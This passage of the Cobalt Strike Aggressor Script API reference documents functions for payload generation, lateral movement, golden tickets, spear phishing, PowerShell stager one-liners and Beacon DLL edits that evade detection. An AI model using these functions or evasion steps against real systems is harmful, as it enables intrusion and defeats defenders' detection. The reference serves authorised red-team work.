      [$tabMgr dockAppTab: $console];
   });
}

Back to Top

openFileBrowser

Open the file browser for a Beacon

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Browse Files" {
   local('$bid');
   foreach $bid ($1) {
      openFileBrowser($bid);
   }
}

Back to Top

openGoldenTicketDialog

open a dialog to help generate a golden ticket

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Golden Ticket" {
   local('$bid');
   foreach $bid ($1) {
      openGoldenTicketDialog($bid);
   }
}

Back to Top

openHTMLApplicationDialog

Open the HTML Application Dialog.

Example

openHTMLApplicationDialog();

Back to Top

openHostFileDialog

Open the host file dialog.

Example

openHostFileDialog();

Back to Top

openInterfaceManager

Open the tab to manage Covert VPN interfaces

Example

openInterfaceManager();

Back to Top

openJavaSignedAppletDialog

Open the Java Signed Applet dialog

Example

openJavaSignedAppletDialog();

Back to Top

openJavaSmartAppletDialog

Open the Java Smart Applet dialog

Example

openJavaSmartAppletDialog();

Back to Top

openJobBrowser

Open the job browser tab.

Arguments

$1 - the array of bids.

Example

openJobBrowser(@($bid))          # open job browser for one Beacon
openJobBrowser(@($bid1, $bid2))  # open job browser for multiple Beacon
openJobBrowser()                 # open job browser for all beacons

Back to Top

openJobConsole

Open the console to the job output.

Arguments

$1 - the Beacon id.

$2 - the Job id.

Back to Top

openJumpDialog

Open Cobalt Strike's lateral movement dialog

Arguments

$1 - the type of lateral movement. See &beacon_remote_exploits for a list of options. ssh and ssh-key are options too.

$2 - an array of targets to apply this action against

Example

openJumpDialog("psexec_psh", @("192.168.1.3", "192.168.1.4"));

Back to Top

openKeystrokeBrowser

Open the keystroke browser tab

Example

openKeystrokeBrowser();

Back to Top

openListenerManager

Open the listener manager

Example

openListenerManager();

Back to Top

openMakeTokenDialog

Open a dialog to help generate an access token.

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Make Token" {
   local('$bid');
   foreach $bid ($1) {
      openMakeTokenDialog($bid);
   }
}

Back to Top

openMalleableProfileDialog

Open the malleable C2 profile dialog.

Example

openMalleableProfileDialog();

Back to Top

openOfficeMacroDialog

Open the office macro export dialog

Example

openOfficeMacroDialog();

Back to Top

openOneLinerDialog

Open the dialog to generate a PowerShell one-liner for this specific Beacon session.

Arguments

$1 - the beacon ID

Example

item "&One-liner" {
   openOneLinerDialog($1);
}

Back to Top

openOrActivate

If a Beacon console exists, make it active. If a Beacon console does not exist, open it.

Arguments

$1 - the Beacon ID

Example

item "&Activate" {
   local('$bid');
   foreach $bid ($1) {
      openOrActivate($bid);
   }
}

Back to Top

openPayloadGeneratorDialog

Open the Payload Generator dialog.

Example

openPayloadGeneratorDialog();

Back to Top

openPayloadGeneratorStageDialog

Open the Payload Generator Stageless dialog.

Example

openPayloadGeneratorStageDialog();

Back to Top

openPayloadHelper

Open a payload chooser dialog.

Arguments

$1 - a callback function. Arguments: $1 - the selected listener.

Example

openPayloadHelper(lambda({
   bspawn($bid, $1);
}, $bid => $1));

Back to Top

openPivotListenerSetup

open the pivot listener setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Listener..." {
   local('$bid');
   foreach $bid ($1) {
      openPivotListenerSetup($bid);
   }
}

Back to Top

openPortScanner

Open the port scanner dialog

Arguments

$1 - an array of targets to scan

Example

openPortScanner(@("192.168.1.3"));

Back to Top

openPortScannerLocal

Open the port scanner dialog with options to target a Beacon's local network

Arguments

$1 - the beacon to target with this feature

Example

item "Scan" {
   local('$bid');
   foreach $bid ($1) {
      openPortScannerLocal($bid);
   }
}

Back to Top

openPowerShellWebDialog

Open the dialog to setup the PowerShell Web Delivery Attack

Example

openPowerShellWebDialog();

Back to Top

openPreferencesDialog

Open the preferences dialog

Example

openPreferencesDialog();

Back to Top

openProcessBrowser

Open a process browser for one or more Beacons

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "Processes" {
   openProcessBrowser($1);
}

Back to Top

openSOCKSBrowser

Open the tab to list SOCKS proxy servers

Example

openSOCKSBrowser();

Back to Top

openSOCKSSetup

open the SOCKS proxy server setup dialog

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "SOCKS Server" {
   local('$bid');
   foreach $bid ($1) {
      openSOCKSSetup($bid);
   }
}

Back to Top

openScreenshotBrowser

Open the screenshot browser tab

Example

openScreenshotBrowser();

Back to Top

openScriptConsole

Open the Aggressor Script console.

Example

# Example using the dispatch_event aggressor script function
on ready {
   # Send the script console tab to the bottom of the cobalt strike window
   dispatch_event({
      $client = getAggressorClient();
      $tabMgr = [$client getTabManager];
      $console = openScriptConsole();
      [$tabMgr dockAppTab: $console];
   });
}

Back to Top

openScriptManager

Open the tab for the script manager.

Example

openScriptManager();

Back to Top

openScriptedWebDialog

Open the dialog to setup a Scripted Web Delivery Attack

Example

openScriptedWebDialog();

Back to Top

openServiceBrowser

Open service browser tab.

Arguments

$1 - an array of targets to show services for

Example

openServiceBrowser(@("192.168.1.3"));

Back to Top

openSiteManager

Open the site manager.

Example

openSiteManager();

Back to Top

openSpawnAsDialog

Open dialog to spawn a payload as another user

Arguments

$1 - the Beacon ID to apply this feature to

Example

item "Spawn As..." {
   local('$bid');
   foreach $bid ($1) {
      openSpawnAsDialog($bid);
   }
}

Back to Top

openSpawnDialog

Open dialog to spawn a payload.

Arguments

$1 - the id for the beacon. This may be an array or a single ID.

Example

item "&Spawn" {
openSpawnDialog($1);
}

Back to Top

openSpearPhishDialog

Open the dialog for the spear phishing tool.

Example

openSpearPhishDialog();

Back to Top

openSystemInformationDialog

Open the system information dialog.

Example

openSystemInformationDialog();

Back to Top

openSystemProfilerDialog

Open the dialog to setup the system profiler.

Example

openSystemProfilerDialog();

Back to Top

openTargetBrowser

Open the targets browser

Example

openTargetBrowser();

Back to Top

openWebLog

Open the web log tab.

Example

# Example using the dispatch_event aggressor script function
on ready {
   # Send the script console tab to the bottom of the cobalt strike window
   dispatch_event({
      $client = getAggressorClient();
      $tabMgr = [$client getTabManager];
      $console = openWebLog();
      [$tabMgr dockAppTab: $console];
   });
}

Back to Top

openWindowsDropperDialog

REMOVED Removed in Cobalt Strike 4.0.

openWindowsExecutableDialog

Open the dialog to generate a Windows executable.

Example

openWindowsExecutableDialog();

Back to Top

openWindowsExecutableStageDialog

Open the dialog to generate a stageless Windows executable.

Example

openWindowsExecutableStageDialog();

Back to Top

openWindowsExecutableStageAllDialog

Open the dialog to generate all of the stageless payloads (in x86 and x64) for all of the configured listeners. This dialog can also be found in the UI menu under Payloads -> Windows Stageless Generate all Payloads.

Example

openWindowsExecutableStageAllDialog();

Back to Top

payload

Exports a raw payload for a specific Cobalt Strike listener.

Arguments

$1 - the listener name

$2 - x86|x64 the architecture of the payload

$3 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$4 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

$5 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload("my listener", "x86", "process", "Direct");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

payload_bootstrap_hint

Get the offset to function pointer hints used by Beacon's Reflective Loader. Populate these hints with the asked-for process addresses to have Beacon load itself into memory in a more OPSEC-safe way.

Arguments

$1 - the payload position-independent code (specifically, Beacon)

$2 - the function to get the patch location for

Notes

  • Cobalt Strike's Beacon has a protocol to accept artifact-provided function pointers for functions required by Beacon's Reflective Loader. The protocol is to patch the location of GetProcAddress and GetModuleHandleA into the Beacon DLL. Use of this protocol allows Beacon to load itself in memory without triggering shellcode detection heuristics that monitor reads of kernel32's Export Address Table. This protocol is optional. Artifacts that don't follow this protocol will fallback to resolving key functions via the Export Address Table.
  • The Artifact Kit and Resource Kit both implement this protocol. Download these kits to see how to use this function.

Returns

The offset to a memory location to patch with a pointer for a specific function used by Beacon's Reflective Loader.

Back to Top

payload_local

Exports a raw payload for a specific Cobalt Strike listener. Use this function when you plan to spawn this payload from another Beacon session. Cobalt Strike will generate a payload that embeds key function pointers, needed to bootstrap the agent, taken from the parent session's metadata.

Arguments

$1 - the parent Beacon session ID

$2 - the listener name

$3 - x86|x64 the architecture of the payload

$4 - exit method: 'thread' (leave the thread when done) or 'process' (exit the process when done). Use 'thread' if injecting into an existing process.

$5 - A string value for the system call method. Valid values are:

None: Use the standard Windows API function.

Direct: Use the Nt* version of the function.

Indirect: Jump to the appropriate instruction within the Nt* version of the function.

$6 - (optional) The supporting HTTP library for generated beacons (wininet|winhttp|$null|blank string).

Returns

A scalar containing position-independent code for the specified listener.

Example

$data = payload_local($bid, "my listener", "x86", "process", "None");

$handle = openf(">out.bin");
writeb($handle, $data);
closef($handle);

Back to Top

pe_insert_rich_header

Insert rich header data into Beacon DLL Content. If there is existing rich header information, it will be replaced.

Arguments

$1 - Beacon DLL content

$2 - Rich header

Returns

Updated DLL Content

Note

The rich header length should be on a 4 byte boundary for subsequent checksum calculations.

Example

# -------------------------------------
# Insert (replace) rich header
# -------------------------------------
$rich_header = "<your rich header info>";
$temp_dll = pe_insert_rich_header($temp_dll, $rich_header);

Back to Top

pe_mask

Mask data in the Beacon DLL Content based on position and length.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Length to mask

$4 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask {

   local('$temp_dll, $start, $length, $maskkey');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name."));
   @val_en = values(%pemap, @("Export.Name."));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $start = parseNumber(@loc_en[0], 10);
   $length = 4;
   $maskkey = 22;

   # -------------------------------------
   # mask some data in a dll
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $start . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $start, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_mask_section

Mask data in the Beacon DLL Content based on position and length.

Arguments

$1 - Beacon DLL content

$2 - Section name

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_section {

   local('$temp_dll, $section_name, $maskkey');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $section_name = ".text";
   $maskkey = 23;

   # -------------------------------------
   # mask a section in a dll
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask_section(dll, " . $section_name . ", " . $maskkey . ")");
   # $temp_dll = pe_mask_section($temp_dll, $section_name, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_mask_string

Mask a string in the Beacon DLL Content based on position.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Byte value mask key (int)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_mask_string {

   local('$temp_dll, $location, $length, $maskkey');
   local('%pemap');
   local('@loc);

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $location = @loc[0];
   $length = 5;
   $maskkey = 23;

   # -------------------------------------
   # pe_mask_string (mask a string in a dll)
   # -------------------------------------
   # warn("pe_mask_string(dll, " . $location . ", " . $maskkey . ")");
   $temp_dll = pe_mask_string($temp_dll, $location, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # un-mask (running the same mask a second time should "un-mask")
   # we are unmasking the length of the string and the null character
   # (This would normally be done by the reflective loader)
   # -------------------------------------
   # warn("pe_mask(dll, " . $location . ", " . $length . ", " . $maskkey . ")");
   # $temp_dll = pe_mask($temp_dll, $location, $length, $maskkey);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_patch_code

Patch code in the Beacon DLL Content based on find/replace in '.text' section'.

Arguments

$1 - Beacon DLL content

$2 - byte array to find for resolve offset

$3 - byte array place at resolved offset (overwrite data)

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content

# ===========================================================================
sub demo_pe_patch_code {

   local('$temp_dll, $findme, $replacement');

   $temp_dll = $1;

   # ====== simple text values ======
   $findme = "abcABC123";
   $replacement = "123ABCabc";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # ====== byte array as a hex string ======
   $findme = "\x01\x02\x03\xfc\xfe\xff";
   $replacement = "\x01\x02\x03\xfc\xfe\xff";

   # warn("pe_patch_code(dll, " . $findme . ", " . $replacement . ")");
   $temp_dll = pe_patch_code($temp_dll, $findme, $replacement);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_remove_rich_header

Remove the rich header from Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Example

# -------------------------------------
# Remove/Replace Rich Header
# -------------------------------------
$temp_dll = pe_remove_rich_header($temp_dll);

Back to Top

pe_set_compile_time_with_long

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a long in milliseconds)

Returns

Updated DLL Content

Example

# date is in milliseconds ("1893521594000" = "01 Jan 2030 12:13:14")
$date = 1893521594000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

# date is in milliseconds ("1700000001000" = "14 Nov 2023 16:13:21")
$date = 1700000001000;
$temp_dll = pe_set_compile_time_with_long($temp_dll, $date);

Back to Top

pe_set_compile_time_with_string

Set the compile time in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

$2 - Compile Time (as a string)

Returns

Updated DLL Content

Example

# ("01 Jan 2020 15:16:17" = "1577913377000")
$strTime = "01 Jan 2020 15:16:17";
$temp_dll = pe_set_compile_time_with_string($temp_dll, $strTime);

Back to Top

pe_set_export_name

Set the export name in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Note

The name must exist in the string table.

Example

# -------------------------------------
# name must be in strings table...
# -------------------------------------
$export_name = "WININET.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

$export_name = "beacon.dll";
$temp_dll = pe_set_export_name($temp_dll, $export_name);

Back to Top

pe_set_long

Places a long value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_long {

   local('$temp_dll, $int_offset, $long_value');
   local('%pemap');
   local('@loc_cs, @val_cs');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   if (size(@val_cs) != 1) {
      warn("Unexpected size of checksum value array: " . size(@val_cs));
   } else {
      warn("Current checksum value: " . @val_cs[0]);
   }

   if (size(@loc_cs) != 1) {
      warn("Unexpected size of checksum location array: " . size(@loc_cs));
   } else {
      warn("Current checksum location: " . @loc_cs[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc_cs[0], 10);
   $long_value = 98765;

   # -------------------------------------
   # pe_set_long (set a long value)
   # -------------------------------------
   # warn("pe_set_long(dll, " . $int_offset . ", " . $long_value . ")");
   $temp_dll = pe_set_long($temp_dll, $int_offset, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_short

Places a short value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_short {

   local('$temp_dll, $int_offset, $short_value');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @(".text.NumberOfRelocations."));
   @val = values(%pemap, @(".text.NumberOfRelocations."));

   if (size(@val) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations value array: " . size(@val));
   } else {
      warn("Current .text.NumberOfRelocations value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of .text.NumberOfRelocations location array: " . size(@loc));
   } else {
      warn("Current .text.NumberOfRelocations location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $int_offset = parseNumber(@loc[0], 10);
   $short_value = 128;

   # -------------------------------------
   # pe_set_short (set a short value)
   # -------------------------------------
   # warn("pe_set_short(dll, " . $int_offset . ", " . $short_value . ")");
   $temp_dll = pe_set_short($temp_dll, $int_offset, $short_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_string

Places a string value at a specified location.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_string {

   local('$temp_dll, $location, $value');
   local('%pemap');
   local('@loc_en, @val_en');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc_en = values(%pemap, @("Export.Name."));
   @val_en = values(%pemap, @("Export.Name."));

   if (size(@val_en) != 1) {
      warn("Unexpected size of export name value array: " . size(@val_en));
   } else {
      warn("Current export value: " . @val_en[0]);
   }

   if (size(@loc_en) != 1) {
      warn("Unexpected size of export location array: " . size(@loc_en));
   } else {
      warn("Current export name location: " . @loc_en[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc_en[0], 10);
   $value = "BEECON.DLL";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $location . ", " . $value . ")");
   $temp_dll = pe_set_string($temp_dll, $location, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_stringz

Places a string value at a specified location and adds a zero terminator.

Arguments

$1 - Beacon DLL content

$2 - Start location

$3 - String to set

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_set_stringz {

   local('$temp_dll, $offset, $value');
   local('%pemap');
   local('@loc');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.0."));

   if (size(@loc) != 1) {
      warn("Unexpected size of section name location array: " . size(@loc));
   } else {
      warn("Current section name location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $offset = parseNumber(@loc[0], 10);
   $value = "abc";

   # -------------------------------------
   # pe_set_stringz
   # -------------------------------------
   # warn("pe_set_stringz(dll, " . $offset . ", " . $value . ")");
   $temp_dll = pe_set_stringz($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   # $offset = parseNumber(@loc[0], 10);
   # $value = ".tex";

   # -------------------------------------
   # pe_set_string (set a string value)
   # -------------------------------------
   # warn("pe_set_string(dll, " . $offset . ", " . $value . ")");
   # $temp_dll = pe_set_string($temp_dll, $offset, $value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_set_value_at

Sets a long value based on the location resolved by a name from the PE Map (see pedump).

Arguments

$1 - Beacon DLL content

$2 - Name of location field

$3 - Value

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = DLL content
# ===========================================================================
sub demo_pe_set_value_at {

   local('$temp_dll, $name, $long_value, $date');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   # %pemap = pedump($temp_dll);
   # @loc = values(%pemap, @("SizeOfImage."));
   # @val = values(%pemap, @("SizeOfImage."));

   # if (size(@val) != 1) {
   #   warn("Unexpected size of SizeOfImage. value array: " . size(@val));
   # } else {
   #   warn("Current SizeOfImage. value: " . @val[0]);
   # }

   # if (size(@loc) != 1) {
   #   warn("Unexpected size of SizeOfImage location array: " . size(@loc));
   # } else {
   #   warn("Current SizeOfImage. location: " . @loc[0]);
   # }

   # -------------------------------------
   # Set parameters
   # -------------------------------------
   $name = "SizeOfImage";
   $long_value = 22334455;

   # -------------------------------------
   # pe_set_value_at (set a long value at the location resolved by name)
   # -------------------------------------
   # $1 = DLL (byte array)
   # $2 = name (string)
   # $3 = value (long)
   # -------------------------------------
   warn("pe_set_value_at(dll, " . $name . ", " . $long_value . ")");
   $temp_dll = pe_set_value_at($temp_dll, $name, $long_value);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # set it back?
   # -------------------------------------
   # warn("pe_set_value_at(dll, " . $name . ", " . @val[0] . ")");
   # $temp_dll = pe_set_value_at($temp_dll, $name, @val[0]);

   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_stomp

Set a string to null characters. Start at a specified location and sets all characters to null until a null string terminator is reached.

Arguments

$1 - Beacon DLL content

$2 - Start location

Returns

Updated DLL Content

Example

# ===========================================================================
# $1 = Beacon DLL content
# ===========================================================================
sub demo_pe_stomp {

   local('$temp_dll, $offset, $value, $old_name');
   local('%pemap');
   local('@loc, @val');

   $temp_dll = $1;

   # -------------------------------------
   # Inspect the current DLL...
   # -------------------------------------
   %pemap = pedump($temp_dll);
   @loc = values(%pemap, @("Sections.AddressOfName.1."));
   @val = values(%pemap, @("Sections.AddressOfName.1."));

   if (size(@val) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 value array: " . size(@val));
   } else {
      warn("Current Sections.AddressOfName.1 value: " . @val[0]);
   }

   if (size(@loc) != 1) {
      warn("Unexpected size of Sections.AddressOfName.1 location array: " . size(@loc));
   } else {
      warn("Current Sections.AddressOfName.1 location: " . @loc[0]);
   }

   # -------------------------------------
   # Set parameters (parse number as base 10)
   # -------------------------------------
   $location = parseNumber(@loc[0], 10);

   # -------------------------------------
   # pe_stomp (stomp a string at a location)
   # -------------------------------------
   # warn("pe_stomp(dll, " . $location . ")");
   $temp_dll = pe_stomp($temp_dll, $location);

   # -------------------------------------
   # Did it work?
   # -------------------------------------
   # dump_my_pe($temp_dll);

   # -------------------------------------
   # All Done!  Give back edited DLL!
   # -------------------------------------
   return $temp_dll;
}

Back to Top

pe_update_checksum

Update the checksum in the Beacon DLL Content.

Arguments

$1 - Beacon DLL content

Returns

Updated DLL Content

Note

This should be the last transformation performed.

Example

# -------------------------------------
# update checksum
# -------------------------------------
$temp_dll = pe_update_checksum($temp_dll);

Back to Top

pedump

Parse an executable Beacon into a map of the PE Header information. The parsed information can be used for research or programmatically to make changes to the Beacon.

Arguments

$1 - Beacon DLL content

Returns

A map of the parsed information. The map data is very similar to the "./peclone dump [file]" command output.

Example

# ===========================================================================
# 'case insensitive sort' from sleep manual...
# ===========================================================================
sub caseInsensitiveCompare
{
   $a = lc($1);
   $b = lc($2);
   return $a cmp $b;
}

# ===========================================================================
# Dump PE Information
# $1 = Beacon DLL content
# ===========================================================================
sub dump_my_pe {
   local('$out $key $val %pemap @sorted_keys');

   %pemap = pedump($1);

   # ---------------------------------------------------
   # Example listing all items from hash/map...
   # ---------------------------------------------------
   @sorted_keys = sort(&caseInsensitiveCompare, keys(%pemap));
   foreach $key (@sorted_keys)
   {
      $out = "$[50]key";
      foreach $val (values(%pemap, @($key)))
      {
         $out .= " $val";
         println($out);
      }
   }

   # ---------------------------------------------------
   # Example of grabbing specific items from hash/map...
   # ---------------------------------------------------
   local('@loc_cs @val_cs');
   @loc_cs = values(%pemap, @("CheckSum.<location>"));
   @val_cs = values(%pemap, @("CheckSum.<value>"));

   println("");
   println("My DLL CheckSum Location: " . @loc_cs);
   println("My DLL CheckSum Value: " . @val_cs);
   println("");
}
See also

./peclone dump [file]

Back to Top

pgraph

Generate the pivot graph GUI component.

Returns

The pivot graph GUI object (a javax.swing.JComponent)

Example

addVisualization("Pivot Graph", pgraph());
See also

&showVisualization

Back to Top

pivots

Returns a list of SOCKS pivots from Cobalt Strike's data model.

Returns

An array of dictionary objects with information about each pivot.

Example

printAll(pivots());

Back to Top

popup_clear

Remove all popup menus associated with the current menu. This is a way to override Cobalt Strike's default popup menu definitions.

Arguments

$1 - the popup hook to clear registered menus for

Example

popup_clear("help");

popup help {
   item "My stuff!" {
      show_message("This is my menu!");
   }
}

Back to Top

powershell

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_stager and &powershell_command instead.

Returns a PowerShell one-liner to bootstrap the specified listener.

Arguments

$1 - the listener name

$2 - [true/false]: is this listener targeting local host?

$3 - x86|x64 - the architecture of the generated stager.

Notes

Be aware that not all listener configurations have x64 stagers. If in doubt, use x86.

Returns

A PowerShell one-liner to run the specified listener.

Example

println(powershell("my listener", false));

Back to Top

powershell_command

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

$2 - will the PowerShell command run on a remote target?

Returns

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_command("2 + 2", false);
println($cmd);

Back to Top

powershell_compress

Compresses a PowerShell script and wraps it in a script to decompress and execute it.

Arguments

$1 - the PowerShell script to compress.

Example

$script = powershell_compress("2 + 2");

Back to Top

powershell_encode_oneliner

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &powershell_command instead.

Returns a one-liner to run a PowerShell expression (e.g., powershell.exe -nop -w hidden -encodedcommand MgAgACsAIAAyAA==)

Arguments

$1 - the PowerShell expression to wrap into a one-liner.

Returns a powershell.exe one-liner to run the specified expression.

Example

$cmd = powershell_encode_oneliner("2 + 2");
println($cmd);

Back to Top

powershell_encode_stager

DEPRECATED This function is deprecated in Cobalt Strike 4.0. Use &artifact_general and &powershell_command instead.

Returns a base64 encoded PowerShell script to run the specified shellcode

Arguments

$1 - shellcode to wrap

Returns

Returns a base64 encoded PowerShell suitable for use with powershell.exe's -enc option.

Example

$shellcode  = shellcode("my listener", false);
$readytouse = powershell_encode_stager($shellcode);
println("powershell.exe -ep bypass -enc $readytouse");

Back to Top

pref_get

Grabs a string value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - the default value [if there is no value for this preference]

Returns

A string with the preference value.

Example

$foo = pref_get("foo.string", "bar");

Back to Top

pref_get_list

Grabs a list value from Cobalt Strike's preferences.

Arguments

$1 - the preference name

Returns

An array with the preference values

Example

@foo = pref_get_list("foo.list");

Back to Top

pref_set

Set a value in Cobalt Strike's preferences

Arguments

$1 - the preference name

$2 - the preference value

Example

pref_set("foo.string", "baz!");

Back to Top

pref_set_list

Stores a list value into Cobalt Strike's preferences.

Arguments

$1 - the preference name

$2 - an array of values for this preference

Example

pref_set_list("foo.list", @("a", "b", "c"));

Back to Top

previousTab

Activate the tab that is to the left of the current tab.

Example

bind Ctrl+Left {
   previousTab();
}

Back to Top

process_browser

Opens the Process Browser. This function does not have any parameters.

Back to Top

privmsg

Post a private message to a user in the event log

Arguments

$1 - who to send the message to   

$2 - the message

Example

privmsg("raffi", "what's up man?");

Back to Top

prompt_confirm

Show a dialog with Yes/No buttons. If the user presses yes, call the specified function.

Arguments

$1 - text in the dialog
